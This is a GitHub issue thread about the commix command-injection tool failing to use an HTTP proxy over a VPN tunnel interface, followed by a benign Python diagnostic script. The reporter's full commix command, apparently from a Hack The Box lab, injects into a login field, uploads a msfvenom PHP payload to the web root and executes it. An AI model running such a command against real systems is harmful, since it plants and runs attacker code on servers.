commixproject / commix

Automated All-in-One OS Command Injection Exploitation Tool.
https://commixproject.com

Commix fails to use HTTP proxy through VPN network interface #546

Closed zar3bski closed 3 years ago

zar3bski commented 3 years ago

What's the problem (or question)?

commix does not seem able to handle proxies in every situation. The following curl works:

curl --proxy "http://10.10.10.200:3128" http://172.31.179.1/intranet.php -v

while commix times out

python  commix.py --url="http://172.31.179.1/intranet.php" --proxy="http://10.10.10.200:3128" --data="Username=INJECT_HERE&Password=sdcsdc" --file-write="/home/zar3bski/Documents/Notes/htb_unbalanced/payloads/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"  --random-agent

[info] The fetched random HTTP User-Agent header value is 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'.
[info] Checking connection to the target URL.           
[critical] Connection timed out.

Do you have an idea for a solution?

The proxy is not accessible through wlp6s0 or any other 'standard' network interfaces but through tun0, a network interface established by openvpn. I am not sure how commix finds and chooses the relevant network interface (I could not find an option for it in the documentation), but it is possible that it fails to work with tun0.

What are the running context details?

Tried with

stasinopoulos commented 3 years ago

Hello @zar3bski, Commix supports SOCKS4/SOCKS5 proxies (please cross-check that it works with Burp). Currently, there is no support for an HTTP proxy through a VPN network interface.

zar3bski commented 3 years ago

I'll check with Burp ASAP. I'll also have a look at the source code, for I am surprised about this SOCKS4/SOCKS5-only support. I noticed that commix does not seem to use requests but somehow defines a whole requests library of its own (injection-related reasons, I guess). Is this the reason for the current limitation?
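
Added example, not code from commix or from either participant: a standalone way to test the interface hypothesis raised in the first comment, using only the Python standard library. It assumes the client does not bind its sockets to a specific interface, in which case the kernel routing table chooses the outgoing interface; the function names are hypothetical and the addresses are the ones given in the report.

```python
import socket
import urllib.error
import urllib.request


def source_ip_for(dest_ip, port=3128):
    """Local address the kernel routing table picks to reach dest_ip, or None.

    connect() on a UDP socket only performs the route lookup; no packet is sent.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        try:
            s.connect((dest_ip, port))
        except OSError:  # no route to the destination
            return None
        return s.getsockname()[0]


def proxy_port_open(host, port, timeout=5.0):
    """True if a TCP connection to the proxy succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def fetch_via_proxy(url, proxy, timeout=10.0):
    """GET url through the given HTTP proxy; returns (status, first 200 body bytes)."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy}))
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, resp.read(200)
    except urllib.error.HTTPError as err:  # proxy or origin answered with 4xx/5xx
        return err.code, b""


if __name__ == "__main__":
    # Addresses taken from the report above.
    proxy_host, proxy_port = "10.10.10.200", 3128
    print("source address towards proxy:", source_ip_for(proxy_host, proxy_port))
    if proxy_port_open(proxy_host, proxy_port):
        print(fetch_via_proxy("http://172.31.179.1/intranet.php",
                              f"http://{proxy_host}:{proxy_port}"))
    else:
        print("proxy TCP port not reachable")
```

If the reported source address is the one assigned to tun0 and the fetch succeeds, routing over the VPN interface works for an ordinary Python HTTP client, which narrows the timeout down to the tool's own proxy handling.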